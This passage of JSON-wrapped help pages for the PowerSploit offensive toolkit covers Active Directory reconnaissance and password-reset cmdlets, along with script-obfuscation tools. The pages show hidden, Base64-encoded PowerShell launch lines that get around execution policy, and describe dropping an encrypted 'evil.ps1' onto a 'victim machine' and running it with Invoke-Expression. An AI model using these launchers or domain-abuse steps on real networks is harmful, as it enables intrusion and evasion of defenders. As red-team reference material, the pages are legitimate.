ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Set-DomainUserPassword.md",
    "content": "# Set-DomainUserPassword\r\n\r\n## SYNOPSIS\r\nSets the password for a given user identity.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-PrincipalContext\r\n\r\n## SYNTAX\r\n\r\n```\r\nSet-DomainUserPassword [-Identity] <String> -AccountPassword <SecureString> [-Domain <String>]\r\n [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nFirst binds to the specified domain context using Get-PrincipalContext.\r\nThe bound domain context is then used to search for the specified user -Identity,\r\nwhich returns a DirectoryServices.AccountManagement.UserPrincipal object.\r\nThe\r\nSetPassword() function is then invoked on the user, setting the password to -AccountPassword.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\nSet-DomainUserPassword -Identity andy -AccountPassword $UserPassword\r\n\r\nResets the password for 'andy' to the password specified.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\nSet-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred\r\n\r\nResets the password for 'andy' usering the alternate credentials specified.\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA user SamAccountName (e.g.\r\nUser1), DistinguishedName (e.g.\r\nCN=user1,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\r\nspecifying the user to reset the password for.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: UserName, UserIdentity, User\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -AccountPassword\r\nSpecifies the password to reset the target user's to.\r\nMandatory.\r\n\r\n```yaml\r\nType: SecureString\r\nParameter Sets: (All)\r\nAliases: Password\r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use to search for the user identity, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### DirectoryServices.AccountManagement.UserPrincipal\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Test-AdminAccess.md",
    "content": "# Test-AdminAccess\r\n\r\n## SYNOPSIS\r\nTests if the current user has administrative access to the local (or a remote) machine.\r\n\r\nIdea stolen from the local_admin_search_enum post module in Metasploit written by:  \r\n    'Brandon McCann \"zeknox\" \\<bmccann\\[at\\]accuvant.com\\>'  \r\n    'Thomas McCarthy \"smilingraccoon\" \\<smilingraccoon\\[at\\]gmail.com\\>'  \r\n    'Royce Davis \"r3dy\" \\<rdavis\\[at\\]accuvant.com\\>'  \r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf\r\n\r\n## SYNTAX\r\n\r\n```\r\nTest-AdminAccess [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will use the OpenSCManagerW Win32API call to establish\r\na handle to the remote host.\r\nIf this succeeds, the current user context\r\nhas local administrator acess to the target.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nTest-AdminAccess -ComputerName sqlserver\r\n```\r\n\r\nReturns results indicating whether the current user has admin access to the 'sqlserver' host.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainComputer | Test-AdminAccess\r\n```\r\n\r\nReturns what machines in the domain the current user has access to.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nTest-AdminAccess -ComputerName sqlserver -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to check for local admin access (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the remote system using Invoke-UserImpersonation.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.AdminAccess\r\n\r\nA PSCustomObject containing the ComputerName and 'IsAdmin' set to whether\r\nthe current user has local admin rights, along with the ComputerName added.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb\r\nhttp://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb\r\nhttp://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/index.md",
    "content": "## PowerView\r\n\r\nPowerView is a PowerShell tool to gain network situational awareness on \r\nWindows domains. It contains a set of pure-PowerShell replacements for various \r\nwindows \"net *\" commands, which utilize PowerShell AD hooks and underlying \r\nWin32 API functions to perform useful Windows domain functionality.\r\n\r\nIt also implements various useful metafunctions, including some custom-written \r\nuser-hunting functions which will identify where on the network specific users \r\nare logged into. It can also check which machines on the domain the current \r\nuser has local administrator access on. Several functions for the enumeration\r\nand abuse of domain trusts also exist. See function descriptions for appropriate \r\nusage and available options. For detailed output of underlying functionality, pass \r\nthe -Verbose or -Debug flags.\r\n\r\nFor functions that enumerate multiple machines, pass the -Verbose flag to get a\r\nprogress status as each host is enumerated. Most of the \"meta\" functions accept \r\nan array of hosts from the pipeline.\r\n\r\n\r\n### Misc Functions:\r\n    Export-PowerViewCSV             -   thread-safe CSV append\r\n    Resolve-IPAddress               -   resolves a hostname to an IP\r\n    ConvertTo-SID                   -   converts a given user/group name to a security identifier (SID)\r\n    Convert-ADName                  -   converts object names between a variety of formats\r\n    ConvertFrom-UACValue            -   converts a UAC int value to human readable form\r\n    Add-RemoteConnection            -   pseudo \"mounts\" a connection to a remote path using the specified credential object\r\n    Remove-RemoteConnection         -   destroys a connection created by New-RemoteConnection\r\n    Invoke-UserImpersonation        -   creates a new \"runas /netonly\" type logon and impersonates the token\r\n    Invoke-RevertToSelf             -   reverts any token impersonation\r\n    Get-DomainSPNTicket             -   request the kerberos ticket for a specified service principal name (SPN)\r\n    Invoke-Kerberoast               -   requests service tickets for kerberoast-able accounts and returns extracted ticket hashes\r\n    Get-PathAcl                     -   get the ACLs for a local/remote file path with optional group recursion\r\n\r\n\r\n### Domain/LDAP Functions:\r\n    Get-DomainDNSZone               -   enumerates the Active Directory DNS zones for a given domain\r\n    Get-DomainDNSRecord             -   enumerates the Active Directory DNS records for a given zone\r\n    Get-Domain                      -   returns the domain object for the current (or specified) domain\r\n    Get-DomainController            -   return the domain controllers for the current (or specified) domain\r\n    Get-Forest                      -   returns the forest object for the current (or specified) forest\r\n    Get-ForestDomain                -   return all domains for the current (or specified) forest\r\n    Get-ForestGlobalCatalog         -   return all global catalogs for the current (or specified) forest\r\n    Find-DomainObjectPropertyOutlier-   inds user/group/computer objects in AD that have 'outlier' properties set\r\n    Get-DomainUser                  -   return all users or specific user objects in AD\r\n    New-DomainUser                  -   creates a new domain user (assuming appropriate permissions) and returns the user object\r\n    Get-DomainUserEvent             -   enumerates account logon events (ID 4624) and Logon with explicit credential events\r\n    Get-DomainComputer              -   returns all computers or specific computer objects in AD\r\n    Get-DomainObject                -   returns all (or specified) domain objects in AD\r\n    Set-DomainObject                -   modifies a gven property for a specified active directory object\r\n    Get-DomainObjectAcl             -   returns the ACLs associated with a specific active directory object\r\n    Add-DomainObjectAcl             -   adds an ACL for a specific active directory object\r\n    Find-InterestingDomainAcl       -   finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects\r\n    Get-DomainOU                    -   search for all organization units (OUs) or specific OU objects in AD\r\n    Get-DomainSite                  -   search for all sites or specific site objects in AD\r\n    Get-DomainSubnet                -   search for all subnets or specific subnets objects in AD\r\n    Get-DomainSID                   -   returns the SID for the current domain or the specified domain\r\n    Get-DomainGroup                 -   return all groups or specific group objects in AD\r\n    New-DomainGroup                 -   creates a new domain group (assuming appropriate permissions) and returns the group object\r\n    Get-DomainManagedSecurityGroup  -   returns all security groups in the current (or target) domain that have a manager set\r\n    Get-DomainGroupMember           -   return the members of a specific domain group\r\n    Add-DomainGroupMember           -   adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so\r\n    Get-DomainFileServer            -   returns a list of servers likely functioning as file servers\r\n    Get-DomainDFSShare              -   returns a list of all fault-tolerant distributed file systems for the current (or specified) domain\r\n\r\n   \r\n### GPO functions\r\n\r\n    Get-DomainGPO                           -   returns all GPOs or specific GPO objects in AD\r\n    Get-DomainGPOLocalGroup                 -   returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences\r\n    Get-DomainGPOUserLocalGroupMapping      -   enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation\r\n    Get-DomainGPOComputerLocalGroupMapping  -   takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation\r\n    Get-DomainPolicy                        -   returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller\r\n\r\n\r\n### Computer Enumeration Functions\r\n\r\n    Get-NetLocalGroup                   -   enumerates the local groups on the local (or remote) machine\r\n    Get-NetLocalGroupMember             -   enumerates members of a specific local group on the local (or remote) machine\r\n    Get-NetShare                        -   returns open shares on the local (or a remote) machine\r\n    Get-NetLoggedon                     -   returns users logged on the local (or a remote) machine\r\n    Get-NetSession                      -   returns session information for the local (or a remote) machine\r\n    Get-RegLoggedOn                     -   returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys\r\n    Get-NetRDPSession                   -   returns remote desktop/session information for the local (or a remote) machine\r\n    Test-AdminAccess                    -   rests if the current user has administrative access to the local (or a remote) machine\r\n    Get-NetComputerSiteName             -   returns the AD site where the local (or a remote) machine resides\r\n    Get-WMIRegProxy                     -   enumerates the proxy server and WPAD conents for the current user\r\n    Get-WMIRegLastLoggedOn              -   returns the last user who logged onto the local (or a remote) machine\r\n    Get-WMIRegCachedRDPConnection       -   returns information about RDP connections outgoing from the local (or remote) machine\r\n    Get-WMIRegMountedDrive              -   returns information about saved network mounted drives for the local (or remote) machine\r\n    Get-WMIProcess                      -   returns a list of processes and their owners on the local or remote machine\r\n    Find-InterestingFile                -   searches for files on the given path that match a series of specified criteria\r\n\r\n\r\n### Threaded 'Meta'-Functions\r\n\r\n    Find-DomainUserLocation             -   finds domain machines where specific users are logged into\r\n    Find-DomainProcess                  -   finds domain machines where specific processes are currently running\r\n    Find-DomainUserEvent                -   finds logon events on the current (or remote domain) for the specified users\r\n    Find-DomainShare                    -   finds reachable shares on domain machines\r\n    Find-InterestingDomainShareFile     -   searches for files matching specific criteria on readable shares in the domain\r\n    Find-LocalAdminAccess               -   finds machines on the local domain where the current user has local administrator access\r\n    Find-DomainLocalGroupMember         -   enumerates the members of specified local group on machines in the domain\r\n\r\n\r\n### Domain Trust Functions:\r\n    Get-DomainTrust                     -   returns all domain trusts for the current domain or a specified domain\r\n    Get-ForestTrust                     -   returns all forest trusts for the current forest or a specified forest\r\n    Get-DomainForeignUser               -   enumerates users who are in groups outside of the user's domain\r\n    Get-DomainForeignGroupMember        -   enumerates groups with users outside of the group's domain and returns each foreign member\r\n    Get-DomainTrustMapping              -   this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds\r\n"
  },
  {
    "path": "docs/ScriptModification/Out-CompressedDll.md",
    "content": "# Out-CompressedDll\r\n\r\n## SYNOPSIS\r\nCompresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.\r\n\r\nPowerSploit Function: Out-CompressedDll  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nOut-CompressedDll [-FilePath] <String>\r\n```\r\n\r\n## DESCRIPTION\r\nOut-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nOut-CompressedDll -FilePath evil.dll\r\n```\r\n\r\nDescription\r\n-----------\r\nCompresses, base64 encodes, and outputs the code required to load evil.dll in memory.\r\n\r\n## PARAMETERS\r\n\r\n### -FilePath\r\nSpecifies the path to a managed executable.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\nOnly pure MSIL-based dlls can be loaded using this technique.\r\nNative or IJW ('it just works' - mixed-mode) dlls will not load.\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html)\r\n\r\n"
  },
  {
    "path": "docs/ScriptModification/Out-EncodedCommand.md",
    "content": "# Out-EncodedCommand\r\n\r\n## SYNOPSIS\r\nCompresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.\r\n\r\nPowerSploit Function: Out-EncodedCommand  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n### FilePath (Default)\r\n```\r\nOut-EncodedCommand [[-Path] <String>] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64] [-WindowStyle <String>]\r\n [-EncodedOutput]\r\n```\r\n\r\n### ScriptBlock\r\n```\r\nOut-EncodedCommand [[-ScriptBlock] <ScriptBlock>] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64]\r\n [-WindowStyle <String>] [-EncodedOutput]\r\n```\r\n\r\n## DESCRIPTION\r\nOut-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt.\r\nThe scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload.\r\nThis technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nOut-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}\r\n```\r\n\r\npowershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream(\\[IO.MemoryStream\\]\\[Convert\\]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),\\[IO.Compression.CompressionMode\\]::Decompress)),\\[Text.Encoding\\]::ASCII)).ReadToEnd()\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nOut-EncodedCommand -Path C:\\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput\r\n```\r\n\r\npowershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=\r\n\r\nDescription\r\n-----------\r\nExecute the above payload for the lulz.\r\n\\>D\r\n\r\n## PARAMETERS\r\n\r\n### -ScriptBlock\r\nSpecifies a scriptblock containing your payload.\r\n\r\n```yaml\r\nType: ScriptBlock\r\nParameter Sets: ScriptBlock\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Path\r\nSpecifies the path to your payload.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: FilePath\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -NoExit\r\nOutputs the option to not exit after running startup commands.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -NoProfile\r\nOutputs the option to not load the Windows PowerShell profile.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -NonInteractive\r\nOutputs the option to not present an interactive prompt to the user.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Wow64\r\nCalls the x86 (Wow64) version of PowerShell on x86_64 Windows installations.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -WindowStyle\r\nOutputs the option to set the window style to Normal, Minimized, Maximized or Hidden.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -EncodedOutput\r\nBase-64 encodes the entirety of the output.\r\nThis is usually unnecessary and effectively doubles the size of the output.\r\nThis option is only for those who are extra paranoid.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\nThis cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, \"PowerShell...OMFG\" (https://www.trustedsec.com/files/PowerShell_PoC.zip)\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.exploit-monday.com](http://www.exploit-monday.com)\r\n\r\n"
  },
  {
    "path": "docs/ScriptModification/Out-EncryptedScript.md",
    "content": "# Out-EncryptedScript\r\n\r\n## SYNOPSIS\r\nEncrypts text files/scripts.\r\n\r\nPowerSploit Function: Out-EncryptedScript  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nOut-EncryptedScript [-ScriptPath] <String> [-Password] <SecureString> [-Salt] <String>\r\n [[-InitializationVector] <String>] [[-FilePath] <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nOut-EncryptedScript will encrypt a script (or any text file for that\r\nmatter) and output the results to a minimally obfuscated script -\r\nevil.ps1 by default.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$Password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\nOut-EncryptedScript .\\Naughty-Script.ps1 $Password salty\r\n\r\nDescription\r\n-----------\r\nEncrypt the contents of this file with a password and salt.\r\nThis will\r\nmake analysis of the script impossible without the correct password\r\nand salt combination.\r\nThis command will generate evil.ps1 that can\r\ndropped onto the victim machine.\r\nIt only consists of a decryption\r\nfunction 'de' and the base64-encoded ciphertext.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n[String] $cmd = Get-Content .\\evil.ps1\r\n```\r\n\r\nInvoke-Expression $cmd\r\n$decrypted = de password salt\r\nInvoke-Expression $decrypted\r\n\r\nDescription\r\n-----------\r\nThis series of instructions assumes you've already encrypted a script\r\nand named it evil.ps1.\r\nThe contents are then decrypted and the\r\nunencrypted script is called via Invoke-Expression\r\n\r\n## PARAMETERS\r\n\r\n### -ScriptPath\r\nPath to this script\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Password\r\nPassword to encrypt/decrypt the script\r\n\r\n```yaml\r\nType: SecureString\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Salt\r\nSalt value for encryption/decryption.\r\nThis can be any string value.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 3\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -InitializationVector\r\nSpecifies a 16-character the initialization vector to be used.\r\nThis\r\nis randomly generated by default.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: ((1..16 | ForEach-Object {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join '')\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FilePath\r\n{{Fill FilePath Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 5\r\nDefault value: .\\evil.ps1\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\nThis command can be used to encrypt any text-based file/script\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/ScriptModification/Remove-Comment.md",
    "content": "# Remove-Comment\r\n\r\n## SYNOPSIS\r\nStrips comments and extra whitespace from a script.\r\n\r\nPowerSploit Function: Remove-Comment  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n### FilePath (Default)\r\n```\r\nRemove-Comment [-Path] <String>\r\n```\r\n\r\n### ScriptBlock\r\n```\r\nRemove-Comment [-ScriptBlock] <ScriptBlock>\r\n```\r\n\r\n## DESCRIPTION\r\nRemove-Comment strips out comments and unnecessary whitespace from a script.\r\nThis is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.\r\n\r\nA major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script.\r\nYou rock, Lee!\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$Stripped = Remove-Comment -Path .\\ScriptWithComments.ps1\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nRemove-Comment -ScriptBlock {\r\n```\r\n\r\n### This is my awesome script.\r\nMy documentation is beyond reproach!\r\n      Write-Host 'Hello, World!' ### Write 'Hello, World' to the host\r\n### End script awesomeness\r\n}\r\n\r\nWrite-Host 'Hello, World!'\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nRemove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand\r\n```\r\n\r\nDescription\r\n-----------\r\nRemoves extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.\r\n\r\n## PARAMETERS\r\n\r\n### -Path\r\nSpecifies the path to your script.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: FilePath\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ScriptBlock\r\nSpecifies a scriptblock containing your 